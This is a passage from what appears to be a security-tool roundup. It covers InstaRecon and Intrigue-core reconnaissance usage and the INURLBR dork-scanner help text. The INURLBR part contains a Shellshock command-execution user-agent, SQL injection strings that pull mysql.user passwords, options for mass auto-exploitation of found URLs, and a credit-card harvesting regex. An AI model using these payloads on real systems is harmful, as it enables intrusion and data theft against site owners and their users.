...all printed nicely on your console or csv file.
InstaRecon will never scan a target directly. Information is retrieved from DNS/Whois servers, Google, and Shodan.

Installing with pip

Simply install dependencies using pip. Tested on Ubuntu 14.04 and Kali Linux 1.1.0a.
pip install -r requirements.txt
or
pip install pythonwhois ipwhois ipaddress shodan


Example

$ ./instarecon.py -s <shodan_key> -o ~/Desktop/github.com.csv github.com
# InstaRecon v0.1 - by Luis Teixeira (teix.co)
# Scanning 1/1 hosts
# Shodan key provided - <shodan_key>

# ____________________ Scanning github.com ____________________ #

# DNS lookups
[*] Domain: github.com

[*] IPs & reverse DNS: 
192.30.252.130 - github.com

[*] NS records:
ns4.p16.dynect.net
    204.13.251.16 - ns4.p16.dynect.net
ns3.p16.dynect.net
    208.78.71.16 - ns3.p16.dynect.net
ns2.p16.dynect.net
    204.13.250.16 - ns2.p16.dynect.net
ns1.p16.dynect.net
    208.78.70.16 - ns1.p16.dynect.net

[*] MX records:
ALT2.ASPMX.L.GOOGLE.com
    173.194.64.27 - oa-in-f27.1e100.net
ASPMX.L.GOOGLE.com
    74.125.203.26
ALT3.ASPMX.L.GOOGLE.com
    64.233.177.26
ALT4.ASPMX.L.GOOGLE.com
    173.194.219.27
ALT1.ASPMX.L.GOOGLE.com
    74.125.25.26 - pa-in-f26.1e100.net

# Whois lookups

[*] Whois domain:
Domain Name: github.com
Registry Domain ID: 1264983250_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.markmonitor.com
Registrar URL: http://www.markmonitor.com
Updated Date: 2015-01-08T04:00:18-0800
Creation Date: 2007-10-09T11:20:50-0700
Registrar Registration Expiration Date: 2020-10-09T11:20:50-0700
Registrar: MarkMonitor, Inc.
Registrar IANA ID: 292
Registrar Abuse Contact Email: abusecomplaints@markmonitor.com
Registrar Abuse Contact Phone: +1.2083895740
Domain Status: clientUpdateProhibited (https://www.icann.org/epp#clientUpdateProhibited)
Domain Status: clientTransferProhibited (https://www.icann.org/epp#clientTransferProhibited)
Domain Status: clientDeleteProhibited (https://www.icann.org/epp#clientDeleteProhibited)
Registry Registrant ID: 
Registrant Name: GitHub Hostmaster
Registrant Organization: GitHub, Inc.
Registrant Street: 88 Colin P Kelly Jr St, 
Registrant City: San Francisco
Registrant State/Province: CA
Registrant Postal Code: 94107
Registrant Country: US
Registrant Phone: +1.4157354488
Registrant Phone Ext: 
Registrant Fax: 
Registrant Fax Ext: 
Registrant Email: hostmaster@github.com
Registry Admin ID: 
Admin Name: GitHub Hostmaster
Admin Organization: GitHub, Inc.
Admin Street: 88 Colin P Kelly Jr St, 
Admin City: San Francisco
Admin State/Province: CA
Admin Postal Code: 94107
Admin Country: US
Admin Phone: +1.4157354488
Admin Phone Ext: 
Admin Fax: 
Admin Fax Ext: 
Admin Email: hostmaster@github.com
Registry Tech ID: 
Tech Name: GitHub Hostmaster
Tech Organization: GitHub, Inc.
Tech Street: 88 Colin P Kelly Jr St, 
Tech City: San Francisco
Tech State/Province: CA
Tech Postal Code: 94107
Tech Country: US
Tech Phone: +1.4157354488
Tech Phone Ext: 
Tech Fax: 
Tech Fax Ext: 
Tech Email: hostmaster@github.com
Name Server: ns1.p16.dynect.net
Name Server: ns2.p16.dynect.net
Name Server: ns4.p16.dynect.net
Name Server: ns3.p16.dynect.net
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2015-05-04T06:48:47-0700

[*] Whois IP:
asn: 36459
asn_cidr: 192.30.252.0/24
asn_country_code: US
asn_date: 2012-11-15
asn_registry: arin
net 0:
    cidr: 192.30.252.0/22
    range: 192.30.252.0 - 192.30.255.255
    name: GITHUB-NET4-1
    description: GitHub, Inc.
    handle: NET-192-30-252-0-1

    address: 88 Colin P Kelly Jr Street
    city: San Francisco
    state: CA
    postal_code: 94107
    country: US

    abuse_emails: abuse@github.com
    tech_emails: hostmaster@github.com

    created: 2012-11-15 00:00:00
    updated: 2013-01-05 00:00:00

# Querying Shodan for open ports
[*] Shodan:
IP: 192.30.252.130
Organization: GitHub
ISP: GitHub

Port: 22
Banner: SSH-2.0-libssh-0.6.0
    Key type: ssh-rsa
    Key: AAAAB3NzaC1yc2EAAAABIwAAAQEAq2A7hRGmdnm9tUDbO9IDSwBK6TbQa+PXYPCPy6rbTrTtw7PH
    kccKrpp0yVhp5HdEIcKr6pLlVDBfOLX9QUsyCOV0wzfjIJNlGEYsdlLJizHhbn2mUjvSAHQqZETY
    P81eFzLQNnPHt4EVVUh7VfDESU84KezmD5QlWpXLmvU31/yMf+Se8xhHTvKSCZIFImWwoG6mbUoW
    f9nzpIoaSjB+weqqUUmpaaasXVal72J+UX2B+2RPW3RcT0eOzQgqlJL3RKrTJvdsjE3JEAvGq3lG
    HSZXy28G3skua2SmVi/w4yCE6gbODqnTWlg7+wC604ydGXA8VJiS5ap43JXiUFFAaQ==
    Fingerprint: 16:27:ac:a5:76:28:2d:36:63:1b:56:4d:eb:df:a6:48
Port: 80
Banner: HTTP/1.1 301 Moved Permanently
    Content-length: 0
    Location: https://192.30.252.130/
    Connection: close

# Querying Google for subdomains and Linkedin pages, this might take a while
[*] Possible LinkedIn page: https://au.linkedin.com/company/github
[*] Subdomains:
blueimp.github.com
    199.27.75.133
bounty.github.com
    199.27.75.133
designmodo.github.com
    199.27.75.133
developer.github.com
    199.27.75.133
digitaloxford.github.com
    199.27.75.133
documentcloud.github.com
    199.27.75.133
education.github.com
    50.19.229.116 - ec2-50-19-229-116.compute-1.amazonaws.com
    50.17.253.231 - ec2-50-17-253-231.compute-1.amazonaws.com
    54.221.249.148 - ec2-54-221-249-148.compute-1.amazonaws.com
enterprise.github.com
    54.243.192.65 - ec2-54-243-192-65.compute-1.amazonaws.com
    54.243.49.169 - ec2-54-243-49-169.compute-1.amazonaws.com
erkie.github.com
    199.27.75.133
eternicode.github.com
    199.27.75.133
facebook.github.com
    199.27.75.133
fortawesome.github.com
    199.27.75.133
gist.github.com
    192.30.252.141 - gist.github.com
guides.github.com
    199.27.75.133
h5bp.github.com
    199.27.75.133
harvesthq.github.com
    199.27.75.133
help.github.com
    199.27.75.133
hexchat.github.com
    199.27.75.133
hubot.github.com
    199.27.75.133
ipython.github.com
    199.27.75.133
janpaepke.github.com
    199.27.75.133
jgilfelt.github.com
    199.27.75.133
jobs.github.com
    54.163.15.207 - ec2-54-163-15-207.compute-1.amazonaws.com
kangax.github.com
    199.27.75.133
karlseguin.github.com
    199.27.75.133
kouphax.github.com
    199.27.75.133
learnboost.github.com
    199.27.75.133
liferay.github.com
    199.27.75.133
lloyd.github.com
    199.27.75.133
mac.github.com
    199.27.75.133
mapbox.github.com
    199.27.75.133
matplotlib.github.com
    199.27.75.133
mbostock.github.com
    199.27.75.133
mdo.github.com
    199.27.75.133
mindmup.github.com
    199.27.75.133
mrdoob.github.com
    199.27.75.133
msysgit.github.com
    199.27.75.133
nativescript.github.com
    199.27.75.133
necolas.github.com
    199.27.75.133
nodeca.github.com
    199.27.75.133
onedrive.github.com
    199.27.75.133
pages.github.com
    199.27.75.133
panrafal.github.com
    199.27.75.133
parquet.github.com
    199.27.75.133
pnts.github.com
    199.27.75.133
raw.github.com
    199.27.75.133
rg3.github.com
    199.27.75.133
rosedu.github.com
    199.27.75.133
schacon.github.com
    199.27.75.133
scottjehl.github.com
    199.27.75.133
shop.github.com
    192.30.252.129 - github.com
shopify.github.com
    199.27.75.133
status.github.com
    184.73.218.119 - ec2-184-73-218-119.compute-1.amazonaws.com
    107.20.225.214 - ec2-107-20-225-214.compute-1.amazonaws.com
thoughtbot.github.com
    199.27.75.133
tomchristie.github.com
    199.27.75.133
training.github.com
    199.27.75.133
try.github.com
    199.27.75.133
twbs.github.com
    199.27.75.133
twitter.github.com
    199.27.75.133
visualstudio.github.com
    54.192.134.13 - server-54-192-134-13.syd1.r.cloudfront.net
    54.230.135.112 - server-54-230-135-112.syd1.r.cloudfront.net
    54.192.134.21 - server-54-192-134-21.syd1.r.cloudfront.net
    54.230.134.194 - server-54-230-134-194.syd1.r.cloudfront.net
    54.192.133.169 - server-54-192-133-169.syd1.r.cloudfront.net
    54.192.133.193 - server-54-192-133-193.syd1.r.cloudfront.net
    54.230.134.145 - server-54-230-134-145.syd1.r.cloudfront.net
    54.240.176.208 - server-54-240-176-208.syd1.r.cloudfront.net
wagerfield.github.com
    199.27.75.133
webcomponents.github.com
    199.27.75.133
webpack.github.com
    199.27.75.133
weheart.github.com
    199.27.75.133

# Reverse DNS lookup on range 192.30.252.0/22
192.30.252.80 - ns1.github.com
192.30.252.81 - ns2.github.com
192.30.252.86 - live.github.com
192.30.252.87 - live.github.com
192.30.252.88 - live.github.com
192.30.252.97 - ops-lb-ip1.iad.github.com
192.30.252.98 - ops-lb-ip2.iad.github.com
192.30.252.128 - github.com
192.30.252.129 - github.com
192.30.252.130 - github.com
192.30.252.131 - github.com
192.30.252.132 - assets.github.com
192.30.252.133 - assets.github.com
192.30.252.134 - assets.github.com
192.30.252.135 - assets.github.com
192.30.252.136 - api.github.com
192.30.252.137 - api.github.com
192.30.252.138 - api.github.com
192.30.252.139 - api.github.com
192.30.252.140 - gist.github.com
192.30.252.141 - gist.github.com
192.30.252.142 - gist.github.com
192.30.252.143 - gist.github.com
192.30.252.144 - codeload.github.com
192.30.252.145 - codeload.github.com
192.30.252.146 - codeload.github.com
192.30.252.147 - codeload.github.com
192.30.252.148 - ssh.github.com
192.30.252.149 - ssh.github.com
192.30.252.150 - ssh.github.com
192.30.252.151 - ssh.github.com
192.30.252.152 - pages.github.com
192.30.252.153 - pages.github.com
192.30.252.154 - pages.github.com
192.30.252.155 - pages.github.com
192.30.252.156 - githubusercontent.github.com
192.30.252.157 - githubusercontent.github.com
192.30.252.158 - githubusercontent.github.com
192.30.252.159 - githubusercontent.github.com
192.30.252.192 - github-smtp2-ext1.iad.github.net
192.30.252.193 - github-smtp2-ext2.iad.github.net
192.30.252.194 - github-smtp2-ext3.iad.github.net
192.30.252.195 - github-smtp2-ext4.iad.github.net
192.30.252.196 - github-smtp2-ext5.iad.github.net
192.30.252.197 - github-smtp2-ext6.iad.github.net
192.30.252.198 - github-smtp2-ext7.iad.github.net
192.30.252.199 - github-smtp2-ext8.iad.github.net
192.30.253.1 - ops-puppetmaster1-cp1-prd.iad.github.com
192.30.253.2 - janky-nix101-cp1-prd.iad.github.com
192.30.253.3 - janky-nix102-cp1-prd.iad.github.com
192.30.253.4 - janky-nix103-cp1-prd.iad.github.com
192.30.253.5 - janky-nix104-cp1-prd.iad.github.com
192.30.253.6 - janky-nix105-cp1-prd.iad.github.com
192.30.253.7 - janky-nix106-cp1-prd.iad.github.com
192.30.253.8 - janky-nix107-cp1-prd.iad.github.com
192.30.253.9 - janky-nix108-cp1-prd.iad.github.com
192.30.253.10 - gw.internaltools-esx1-cp1-prd.iad.github.com
192.30.253.11 - janky-chromium101-cp1-prd.iad.github.com
192.30.253.12 - gw.internaltools-esx2-cp1-prd.iad.github.com
192.30.253.13 - github-mon2ext-cp1-prd.iad.github.net
192.30.253.16 - github-smtp2a-ext-cp1-prd.iad.github.net
192.30.253.17 - github-smtp2b-ext-cp1-prd.iad.github.net
192.30.253.23 - ops-bastion1-cp1-prd.iad.github.com
192.30.253.30 - github-slowsmtp1-ext-cp1-prd.iad.github.net
192.30.254.1 - github-lb3a-cp1-prd.iad.github.com
192.30.254.2 - github-lb3b-cp1-prd.iad.github.com
192.30.254.3 - github-lb3c-cp1-prd.iad.github.com
192.30.254.4 - github-lb3d-cp1-prd.iad.github.com
# Saving output csv file
# Done


Download InstaRecon

Intrigue - Intelligence Gathering Framework


Intrigue-core is an API-first intelligence gathering framework for Internet reconnaissance and research.

Setting up a development environment

The following are presumed available and configured in your environment
  • redis
  • sudo
  • nmap
  • zmap
  • masscan
  • java runtime
Sudo is used to allow root access for certain commands ^ , so make sure this doesn't require a password:
your-username ALL = NOPASSWD: /usr/bin/masscan, /usr/sbin/zmap, /usr/bin/nmap

Starting up...

Make sure you have redis installed and running. (Use Homebrew if you're on OSX).
Install all gem dependencies with Bundler (http://bundler.io/)
$ bundle install
Start the web and background workers. Intrigue will start on 127.0.0.0:7777.
$ foreman start
Now, browse to the web interface.

Using the web interface

To use the web interface, browse to http://127.0.0.1:7777
Getting started should be pretty straightforward, try running a "dns_brute_sub" task on your domain. Now, try with the "use_file" option set to true.

API usage via core-cli:

A command line utility has been added for convenience, core-cli.
List all available tasks:
$ bundle exec ./core-cli.rb list
Start a task:
$ bundle exec ./core-cli.rb start dns_lookup_forward DnsRecord#intrigue.io
Start a task with options:
$ bundle exec ./core-cli.rb start dns_brute_sub DnsRecord#intrigue.io resolver=8.8.8.8#brute_list=1,2,3,4,www#use_permutations=true
[+] Starting task
[+] Task complete!
[+] Start Results
  DnsRecord#www.intrigue.io
  IpAddress#192.0.78.13
[ ] End Results
[+] Task Log:
[ ] : Got allowed option: resolver
[ ] : Allowed option: {:name=>"resolver", :type=>"String", :regex=>"ip_address", :default=>"8.8.8.8"}
[ ] : Regex should match an IP Address
[ ] : No need to convert resolver to a string
[+] : Allowed user_option! {"name"=>"resolver", "value"=>"8.8.8.8"}
[ ] : Got allowed option: brute_list
[ ] : Allowed option: {:name=>"brute_list", :type=>"String", :regex=>"alpha_numeric_list", :default=>["mx", "mx1", "mx2", "www", "ww2", "ns1", "ns2", "ns3", "test", "mail", "owa", "vpn", "admin", "intranet", "gateway", "secure", "admin", "service", "tools", "doc", "docs", "network", "help", "en", "sharepoint", "portal", "public", "private", "pub", "zeus", "mickey", "time", "web", "it", "my", "photos", "safe", "download", "dl", "search", "staging"]}
[ ] : Regex should match an alpha-numeric list
[ ] : No need to convert brute_list to a string
[+] : Allowed user_option! {"name"=>"brute_list", "value"=>"1,2,3,4,www"}
[ ] : Got allowed option: use_permutations
[ ] : Allowed option: {:name=>"use_permutations", :type=>"Boolean", :regex=>"boolean", :default=>true}
[ ] : Regex should match a boolean
[+] : Allowed user_option! {"name"=>"use_permutations", "value"=>true}
[ ] : user_options: [{"resolver"=>"8.8.8.8"}, {"brute_list"=>"1,2,3,4,www"}, {"use_permutations"=>true}]
[ ] : Task: dns_brute_sub
[ ] : Id: fddc7313-52f6-4d5a-9aad-fd39b0428ca5
[ ] : Task entity: {"type"=>"DnsRecord", "attributes"=>{"name"=>"intrigue.io"}}
[ ] : Task options: [{"resolver"=>"8.8.8.8"}, {"brute_list"=>"1,2,3,4,www"}, {"use_permutations"=>true}]
[ ] : Option configured: resolver=8.8.8.8
[ ] : Option configured: use_file=false
[ ] : Option configured: brute_file=dns_sub.list
[ ] : Option configured: use_mashed_domains=false
[ ] : Option configured: brute_list=1,2,3,4,www
[ ] : Option configured: use_permutations=true
[ ] : Using provided brute list
[+] : Using subdomain list: ["1", "2", "3", "4", "www"]
[+] : Looks like no wildcard dns. Moving on.
[-] : Hit exception: no address for 1.intrigue.io
[-] : Hit exception: no address for 2.intrigue.io
[-] : Hit exception: no address for 3.intrigue.io
[-] : Hit exception: no address for 4.intrigue.io
[+] : Resolved Address 192.0.78.13 for www.intrigue.io
[+] : Creating entity: DnsRecord, {:name=>"www.intrigue.io"}
[+] : Creating entity: IpAddress, {:name=>"192.0.78.13"}
[ ] : Adding permutations: www1, www2
[-] : Hit exception: no address for www1.intrigue.io
[-] : Hit exception: no address for www2.intrigue.io
[+] : Ship it!
[ ] : Sending to Webhook: http://localhost:7777/v1/task_runs/fddc7313-52f6-4d5a-9aad-fd39b0428ca5
Check for a list of subdomains on intrigue.io:
$ bundle exec ./core-cli.rb start dns_brute_sub DnsRecord#intrigue.io resolver=8.8.8.8#brute_list=a,b,c,proxy,test,www
Check the Alexa top 1000 domains for the existence of security headers:
$ for x in `cat data/domains.txt | head -n 1000`; do bundle exec ./core-cli.rb start dns_brute_sub DnsRecord#$x;done

API usage via rubygem

$ gem install intrigue
$ irb

> require 'intrigue'
> x =  Intrigue.new

  # Create an entity hash, must have a :type key
  # and (in the case of most tasks)  a :attributes key
  # with a hash containing a :name key (as shown below)
> entity = {
    :type => "String",
    :attributes => { :name => "intrigue.io"}
  }

  # Create a list of options (this can be empty)
> options_list = [
    { :name => "resolver", :value => "8.8.8.8" }
  ]

> x.start "example", entity_hash, options_list
> id  = x.start "example", entity_hash, options_list
> puts x.get_log id
> puts x.get_result id

API usage via curl:

You can use the tried and true curl utility to request a task run. Specify the task type, specify an entity, and the appropriate options:
$ curl -s -X POST -H "Content-Type: application/json" -d '{ "task": "example", "entity": { "type": "String", "attributes": { "name": "8.8.8.8" } }, "options": {} }' http://127.0.0.1:7777/v1/task_runs


Download Intrigue-core

INURLBR - Advanced Search in Multiple Search Engines



Advanced search in search engines, enables analysis provided to exploit GET / POST capturing emails & urls, with an internal custom validation junction for each target / url found.

INURLBR scanner was developed by Cleiton Pinheiro, owner and founder of INURL - BRASIL.

Tool made ​​in PHP that can run on different Linux distributions helps hackers / security professionals in their specific searches.

With several options are automated methods of exploration, AND SCANNER is known for its ease of use and performasse.

The inspiration to create the inurlbr scanner, was the XROOT Scan 5.2 application.

Long desription

The INURLBR tool was developed aiming to meet the need of Hacking community.
Purpose: Make advanced searches to find potential vulnerabilities in web applications known as Google Hacking with various options and search filters, this tool has an absurd power of search engines available with (24) + 6 engines special(deep web)
  •   - Possibility generate IP ranges or random_ip and analyze their targets.
  •   - Customization of  HTTP-HEADER, USER-AGET, URL-REFERENCE.
  •   - Execution external to exploit certain targets.
  •   - Generator dorks random or set file dork.
  •   - Option to set proxy, file proxy list, http proxy, file http proxy.
  •   - Set time random proxy.
  •   - It is possible to use TOR ip Random.
  •   - Debug processes urls, http request, process irc.
  •   - Server communication irc sending vulns urls for chat room.
  •   - Possibility injection exploit GET / POST => SQLI, LFI, LFD.
  •   - Filter and validation based regular expression.
  •   - Extraction of email and url.
  •   - Validation using http-code.
  •   - Search pages based on strings file.
  •   - Exploits commands manager.
  •   - Paging limiter on search engines.
  •   - Beep sound when trigger vulnerability note.
  •   - Use text file as a data source for urls tests.
  •   - Find personalized strings in return values of the tests.
  •   - Validation vulnerability shellshock.
  •   - File validation values wordpress wp-config.php.
  •   - Execution sub validation processes.
  •   - Validation syntax errors database and programmin.
  •   - Data encryption as native parameter.
  •   - Random google host.
  •   - Scan port.
  •   - Error Checking & values​​:
LIB & PERMISSION:
  • PHP Version         5.4.7
  • php5-curl           LIB
  • php5-cli            LIB  
  • cURL support        enabled
  • cURL Information    7.24.0
  • allow_url_fopen     On
  • permission          Reading & Writing
  • User                root privilege, or is in the sudoers group
  • Operating system    LINUX
  • Proxy random        TOR
  • PERMISSION EXECUTION: chmod +x inurlbr.php
  • INSTALLING LIB CURL: sudo apt-get install php5-curl
  • INSTALLING LIB CLI: sudo apt-get install php5-cli
  • INSTALLING PROXY TOR https://www.torproject.org/docs/debian.html.en
resume: apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl

Help:
-h
--help   Alternative long length help command.
--ajuda  Command to specify Help.
--info   Information script.
--update Code update.    
-q       Choose which search engine you want through [1...24] / [e1..6]]:
     [options]:
     1   - GOOGLE / (CSE) GENERIC RANDOM / API
     2   - BING
     3   - YAHOO BR
     4   - ASK
     5   - HAO123 BR
     6   - GOOGLE (API)
     7   - LYCOS
     8   - UOL BR
     9   - YAHOO US
     10  - SAPO
     11  - DMOZ
     12  - GIGABLAST
     13  - NEVER
     14  - BAIDU BR
     15  - YANDEX
     16  - ZOO
     17  - HOTBOT
     18  - ZHONGSOU
     19  - HKSEARCH
     20  - EZILION
     21  - SOGOU
     22  - DUCK DUCK GO
     23  - BOOROW
     24  - GOOGLE(CSE) GENERIC RANDOM
     ----------------------------------------
                 SPECIAL MOTORS
     ----------------------------------------
     e1  - TOR FIND
     e2  - ELEPHANT
     e3  - TORSEARCH
     e4  - WIKILEAKS
     e5  - OTN
     e6  - EXPLOITS SHODAN
     ----------------------------------------
     all - All search engines / not special motors
     Default:    1
     Example: -q {op}
     Usage:   -q 1
              -q 5
               Using more than one engine:  -q 1,2,5,6,11,24
               Using all engines:      -q all

 --proxy Choose which proxy you want to use through the search engine:
     Example: --proxy {proxy:port}
     Usage:   --proxy localhost:8118
              --proxy socks5://googleinurl@localhost:9050
              --proxy http://admin:12334@172.16.0.90:8080

 --proxy-file Set font file to randomize your proxy to each search engine.
     Example: --proxy-file {proxys}
     Usage:   --proxy-file proxys_list.txt

 --time-proxy Set the time how often the proxy will be exchanged.
     Example: --time-proxy {second}
     Usage:   --time-proxy 10

 --proxy-http-file Set file with urls http proxy, 
     are used to bular capch search engines
     Example: --proxy-http-file {youfilehttp}
     Usage:   --proxy-http-file http_proxys.txt


 --tor-random Enables the TOR function, each usage links an unique IP.

 -t  Choose the validation type: op 1, 2, 3, 4, 5
     [options]:
     1   - The first type uses default errors considering the script:
     It establishes connection with the exploit through the get method.
     Demo: www.alvo.com.br/pasta/index.php?id={exploit}

     2   -  The second type tries to valid the error defined by: -a='VALUE_INSIDE_THE _TARGET'
     It also establishes connection with the exploit through the get method
     Demo: www.alvo.com.br/pasta/index.php?id={exploit}

     3   - The third type combine both first and second types:
     Then, of course, it also establishes connection with the exploit through the get method
     Demo: www.target.com.br{exploit}
     Default:    1
     Example: -t {op}
     Usage:   -t 1

     4   - The fourth type a validation based on source file and will be enabled scanner standard functions.
     The source file their values are concatenated with target url.
     - Set your target with command --target {http://target}
     - Set your file with command -o {file}
     Explicative:
     Source file values:
     /admin/index.php?id=
     /pag/index.php?id=
     /brazil.php?new=
     Demo: 
     www.target.com.br/admin/index.php?id={exploit}
     www.target.com.br/pag/index.php?id={exploit}
     www.target.com.br/brazil.php?new={exploit}

     5   - (FIND PAGE) The fifth type of validation based on the source file,
     Will be enabled only one validation code 200 on the target server, or if the url submit such code will be considered vulnerable.
     - Set your target with command --target {http://target}
     - Set your file with command -o {file}
     Explicative:
     Source file values:
     /admin/admin.php
     /admin.asp
     /admin.aspx
     Demo: 
     www.target.com.br/admin/admin.php
     www.target.com.br/admin.asp
     www.target.com.br/admin.aspx
     Observation: If it shows the code 200 will be separated in the output file

     DEFAULT ERRORS:  

     [*]JAVA INFINITYDB, [*]LOCAL FILE INCLUSION, [*]ZIMBRA MAIL,           [*]ZEND FRAMEWORK, 
     [*]ERROR MARIADB,   [*]ERROR MYSQL,          [*]ERROR JBOSSWEB,        [*]ERROR MICROSOFT,
     [*]ERROR ODBC,      [*]ERROR POSTGRESQL,     [*]ERROR JAVA INFINITYDB, [*]ERROR PHP,
     [*]CMS WORDPRESS,   [*]SHELL WEB,            [*]ERROR JDBC,            [*]ERROR ASP,
     [*]ERROR ORACLE,    [*]ERROR DB2,            [*]JDBC CFM,              [*]ERROS LUA, 
     [*]ERROR INDEFINITE


 --dork Defines which dork the search engine will use.
     Example: --dork {dork}
     Usage:   --dork 'site:.gov.br inurl:php? id'
     - Using multiples dorks:
     Example: --dork {[DORK]dork1[DORK]dork2[DORK]dork3}
     Usage:   --dork '[DORK]site:br[DORK]site:ar inurl:php[DORK]site:il inurl:asp'

 --dork-file Set font file with your search dorks.
     Example: --dork-file {dork_file}
     Usage:   --dork-file 'dorks.txt'

 --exploit-get Defines which exploit will be injected through the GET method to each URL found.
     Example: --exploit-get {exploit_get}
     Usage:   --exploit-get "?'´%270x27;"

 --exploit-post Defines which exploit will be injected through the POST method to each URL found.
     Example: --exploit-post {exploit_post}
     Usage:   --exploit-post 'field1=valor1&field2=valor2&field3=?´0x273exploit;&botao=ok'

 --exploit-command Defines which exploit/parameter will be executed in the options: --command-vul/ --command-all.   
     The exploit-command will be identified by the paramaters: --command-vul/ --command-all as _EXPLOIT_      
     Ex --exploit-command '/admin/config.conf' --command-all 'curl -v _TARGET__EXPLOIT_'
     _TARGET_ is the specified URL/TARGET obtained by the process
     _EXPLOIT_ is the exploit/parameter defined by the option --exploit-command.
     Example: --exploit-command {exploit-command}
     Usage:   --exploit-command '/admin/config.conf'  

 -a  Specify the string that will be used on the search script:
     Example: -a {string}
     Usage:   -a '<title>hello world</title>'

 -d  Specify the script usage op 1, 2, 3, 4, 5.
     Example: -d {op}
     Usage:   -d 1 /URL of the search engine.
              -d 2 /Show all the url.
              -d 3 /Detailed request of every URL.
              -d 4 /Shows the HTML of every URL.
              -d 5 /Detailed request of all URLs.
              -d 6 /Detailed PING - PONG irc.    

 -s  Specify the output file where it will be saved the vulnerable URLs.

     Example: -s {file}
     Usage:   -s your_file.txt

 -o  Manually manage the vulnerable URLs you want to use from a file, without using a search engine.
     Example: -o {file_where_my_urls_are}
     Usage:   -o tests.txt

 --persist  Attempts when Google blocks your search.
     The script tries to another google host / default = 4
     Example: --persist {number_attempts}
     Usage:   --persist 7

 --ifredirect  Return validation method post REDIRECT_URL
     Example: --ifredirect {string_validation}
     Usage:   --ifredirect '/admin/painel.php'

 -m  Enable the search for emails on the urls specified.

 -u  Enables the search for URL lists on the url specified.

 --gc Enable validation of values ​​with google webcache.

 --pr  Progressive scan, used to set operators (dorks), 
     makes the search of a dork and valid results, then goes a dork at a time.

 --file-cookie Open cookie file.

 --save-as Save results in a certain place.

 --shellshock Explore shellshock vulnerability by setting a malicious user-agent.

 --popup Run --command all or vuln in a parallel terminal.

 --cms-check Enable simple check if the url / target is using CMS.

 --no-banner Remove the script presentation banner.

 --unique Filter results in unique domains.

 --beep Beep sound when a vulnerability is found.

 --alexa-rank Show alexa positioning in the results.

 --robots Show values file robots.

 --range Set range IP.
      Example: --range {range_start,rage_end}
      Usage:   --range '172.16.0.5#172.16.0.255'

 --range-rand Set amount of random ips.
      Example: --range-rand {rand}
      Usage:   --range-rand '50'

 --irc Sending vulnerable to IRC / server channel.
      Example: --irc {server#channel}
      Usage:   --irc 'irc.rizon.net#inurlbrasil'

 --http-header Set HTTP header.
      Example: --http-header {youemail}
      Usage:   --http-header 'HTTP/1.1 401 Unauthorized,WWW-Authenticate: Basic realm="Top Secret"'

 --sedmail Sending vulnerable to email.
      Example: --sedmail {youemail}
      Usage:   --sedmail youemail@inurl.com.br

 --delay Delay between research processes.
      Example: --delay {second}
      Usage:   --delay 10

 --time-out Timeout to exit the process.
      Example: --time-out {second}
      Usage:   --time-out 10

 --ifurl Filter URLs based on their argument.
      Example: --ifurl {ifurl}
      Usage:   --ifurl index.php?id=

 --ifcode Valid results based on your return http code.
      Example: --ifcode {ifcode}
      Usage:   --ifcode 200

 --ifemail Filter E-mails based on their argument.
     Example: --ifemail {file_where_my_emails_are}
     Usage:   --ifemail sp.gov.br

 --url-reference Define referring URL in the request to send him against the target.
      Example: --url-reference {url}
      Usage:   --url-reference http://target.com/admin/user/valid.php

 --mp Limits the number of pages in the search engines.
     Example: --mp {limit}
     Usage:   --mp 50

 --user-agent Define the user agent used in its request against the target.
      Example: --user-agent {agent}
      Usage:   --user-agent 'Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11'
      Usage-exploit / SHELLSHOCK:   
      --user-agent '() { foo;};echo; /bin/bash -c "expr 299663299665 / 3; echo CMD:;id; echo END_CMD:;"'
      Complete command:    
      php inurlbr.php --dork '_YOU_DORK_' -s shellshock.txt --user-agent '_YOU_AGENT_XPL_SHELLSHOCK' -t 2 -a '99887766555'

 --sall Saves all urls found by the scanner.
     Example: --sall {file}
     Usage:   --sall your_file.txt

 --command-vul Every vulnerable URL found will execute this command parameters.
     Example: --command-vul {command}
     Usage:   --command-vul 'nmap sV -p 22,80,21 _TARGET_'
              --command-vul './exploit.sh _TARGET_ output.txt'
              --command-vul 'php miniexploit.php -t _TARGET_ -s output.txt'

 --command-all Use this commmand to specify a single command to EVERY URL found.
     Example: --command-all {command}
     Usage:   --command-all 'nmap sV -p 22,80,21 _TARGET_'
              --command-all './exploit.sh _TARGET_ output.txt'
              --command-all 'php miniexploit.php -t _TARGET_ -s output.txt'
    [!] Observation:

    _TARGET_ will be replaced by the URL/target found, although if the user  
    doesn't input the get, only the domain will be executed.

    _TARGETFULL_ will be replaced by the original URL / target found.

    _TARGETXPL_ will be replaced by the original URL / target found + EXPLOIT --exploit-get.

    _TARGETIP_ return of ip URL / target found.

    _URI_ Back URL set of folders / target found.

    _RANDOM_ Random strings.

    _PORT_ Capture port of the current test, within the --port-scan process.

    _EXPLOIT_  will be replaced by the specified command argument --exploit-command.
   The exploit-command will be identified by the parameters --command-vul/ --command-all as _EXPLOIT_

 --replace Replace values ​​in the target URL.
    Example:  --replace {value_old[INURL]value_new}
     Usage:   --replace 'index.php?id=[INURL]index.php?id=1666+and+(SELECT+user,Password+from+mysql.user+limit+0,1)=1'
              --replace 'main.php?id=[INURL]main.php?id=1+and+substring(@@version,1,1)=1'
              --replace 'index.aspx?id=[INURL]index.aspx?id=1%27´'

 --remove Remove values ​​in the target URL.
      Example: --remove {string}
      Usage:   --remove '/admin.php?id=0'

 --regexp Using regular expression to validate his research, the value of the 
    Expression will be sought within the target/URL.
    Example:  --regexp {regular_expression}
    All Major Credit Cards:
    Usage:    --regexp '(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14}|6011[0-9]{12}|3(?:0[0-5]|[68][0-9])[0-9]{11}|3[47][0-9]{13})'

    IP Addresses:
    Usage:    --regexp '((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))'

    EMAIL:   
    Usage:    --regexp '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)'


 ---regexp-filter Using regular expression to filter his research, the value of the 
     Expression will be sought within the target/URL.
    Example:  ---regexp-filter {regular_expression}
    EMAIL:   
    Usage:    ---regexp-filter '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)'


    [!] Small commands manager:

 --exploit-cad Command register for use within the scanner.
